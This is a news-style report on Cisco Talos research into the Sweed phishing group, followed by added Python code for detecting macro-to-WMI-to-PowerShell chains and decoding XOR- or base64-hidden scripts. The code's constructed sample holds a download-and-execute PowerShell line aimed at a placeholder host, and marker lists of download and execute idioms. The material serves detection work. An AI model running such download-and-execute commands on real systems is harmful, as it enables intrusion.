A threat actor named Sweed, who has been active for more than two years using spearphishing emails with malicious attachments to spread Formbook, Lokibot and Agent Tesla, has been given a detailed examination by Cisco Talos.

Cisco Talos researcher Edmund Brumaghin said that for the most part Agent Tesla is the group’s favorite flavor of malware, but noted that Sweed has used a variety of delivery methods since 2017.

The first, used in 2017, had Sweed place a dropper inside a .zip archive containing Agent Tesla and then attach the file to an email claiming to contain a purchase order. The packer used .NET and leveraged steganography to hide and decode a second .NET executable, which uses the same technique to retrieve the final Agent Tesla payload, Brumaghin wrote.

Then in January 2018 Sweed moved on to Java-based droppers, which were also attached to emails claiming to be a purchase or order of some type. The next change took place in April 2018, when Sweed began exploiting the already patched CVE-2017-8759, a remote code execution vulnerability in the Microsoft .NET Framework, delivered through Microsoft Office, specifically PowerPoint: code placed inside a slide triggers the .NET flaw when the document is opened. The next month Sweed moved on to another Office remote code execution flaw, CVE-2017-11882, which it used in fake invoices to again download Agent Tesla.

In 2019 Sweed continued to use Office, but this time, instead of exploiting a vulnerability, it leveraged Office macros in email attachments purporting to be product orders. These could take the form of an obfuscated VBA macro that launches a PowerShell script through a WMI call, with the PowerShell script itself camouflaged using XOR operations. Once decoded, the script is revealed to be a .NET executable, which performs a couple of checks and then downloads and executes what turns out to be an AutoIT-compiled script.

Sweed’s operation has no regional focus; it attacks countries across the globe, including the U.S., Canada, Russia, China, Singapore and South Africa. The threat actors are also not zeroed in on any particular industry, hitting primarily logistics and manufacturing entities with a sprinkling of energy and defense companies for good measure.

Talos was also able to identify an actor on several forums who went by Sweed or Swee D, and actively interacted with that person. The individual claimed to be an ethical hacker, but further investigation found a person with the same name in a forum working with stolen credit card information.

Because these identities were found with relative ease, and many of the tools used come from easily obtained kits, Brumaghin described Sweed as likely an amateur.

“Based on the TTPs used by this group, SWEED should be
considered a relatively amateur actor. They use well-known vulnerabilities,
commodity stealers and RATs (Pony, Formbook, UnknownRAT, Agent Tesla, etc.) and
appear to rely on kits readily available on hacking forums. SWEED consistently
leverages packing and crypting in order to minimize detection by anti-malware
solutions,” he said.
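The 2019 chain described earlier (an obfuscated VBA macro that starts PowerShell through a WMI call, with the PowerShell stage XOR-camouflaged) is the part of this report a detection engineer would want to turn into a check. The Python below is an added example, not code from Talos, SC Media or the actor; the process-creation records, the stage-two script and the XOR key are all constructed for illustration, and it assumes Sysmon-style events with parent image, image and command line, plus the simplest form of XOR camouflage, a single repeating byte.

```python
"""Added example (not from Talos or the article): triage helpers for a macro -> WMI ->
PowerShell -> XOR chain. All sample data below is constructed."""
import base64
import re

# 1. Parent/child relationship. A macro that calls Win32_Process.Create through
#    "winmgmts:" does not spawn the child from WINWORD.EXE or POWERPNT.EXE; the WMI
#    provider host creates it, so the new shell's parent is WmiPrvSE.exe. That is the signal.
WMI_PROVIDER_HOST = "wmiprvse.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_wmi_spawned_hosts(events):
    """Return the events in which a script host was spawned by the WMI provider host."""
    return [e for e in events
            if _basename(e["parent"]) == WMI_PROVIDER_HOST
            and _basename(e["image"]) in SCRIPT_HOSTS]


# 2. -EncodedCommand recovery: the argument is base64 over the UTF-16LE script text.
_ENC_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if the line carries none."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# 3. XOR-camouflaged script: brute-force the single-byte key and keep the candidate whose
#    plaintext contains the most PowerShell idioms (a wrong key scores 0 in practice).
PS_MARKERS = (b"New-Object", b"DownloadString", b"DownloadFile", b"IEX ",
              b"Invoke-Expression", b"Start-Process", b"FromBase64String")


def xor_single_byte(data, key):
    return bytes(b ^ key for b in data)


def recover_xor_key(blob):
    """Return (key, plaintext) for the single-byte key that best decodes blob."""
    best = (0, blob, -1)
    for key in range(256):
        plain = xor_single_byte(blob, key)
        score = sum(plain.count(m) for m in PS_MARKERS)
        if score > best[2]:
            best = (key, plain, score)
    return best[0], best[1]


# 4. Constructed sample data (NOT taken from the Talos report).
STAGE_SCRIPT = ("$w=New-Object Net.WebClient;"
                "IEX $w.DownloadString('http://example.invalid/stage2.ps1')")
ENCODED_ARG = base64.b64encode(STAGE_SCRIPT.encode("utf-16le")).decode()
XOR_KEY = 0x5A                                   # arbitrary key chosen for the sample
XORED_STAGE = xor_single_byte(STAGE_SCRIPT.encode(), XOR_KEY)

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",          # macro -> WMI -> shell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENCODED_ARG},
    {"parent": r"C:\Windows\System32\svchost.exe",                 # normal provider host start
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"parent": r"C:\Windows\explorer.exe",                         # interactive shell, not flagged
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
]


def triage(events):
    """Flag WMI-spawned script hosts and attach whatever script text can be recovered."""
    return [{"cmdline": e["cmdline"], "script": decode_encoded_command(e["cmdline"])}
            for e in flag_wmi_spawned_hosts(events)]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print("WMI-spawned host:", f["cmdline"][:60], "...")
        print("  decoded -enc  :", f["script"])
    key, plain = recover_xor_key(XORED_STAGE)
    print("recovered XOR key: 0x%02x -> %s" % (key, plain.decode()))
```

Two caveats when using this for real: WmiPrvSE.exe also spawns processes for legitimate management tooling, so the parent/child rule needs tuning on command line and the decoded script rather than being treated as a verdict on its own; and the key search covers only a single-byte XOR, so a multi-byte key needs key-length recovery first.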